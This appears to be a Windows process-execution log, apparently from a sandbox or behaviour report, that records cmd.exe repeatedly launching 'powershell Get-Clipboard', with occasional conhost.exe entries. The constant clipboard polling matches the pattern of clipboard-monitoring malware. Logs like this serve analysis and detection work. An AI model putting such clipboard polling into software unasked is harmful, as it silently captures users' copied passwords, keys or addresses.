C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
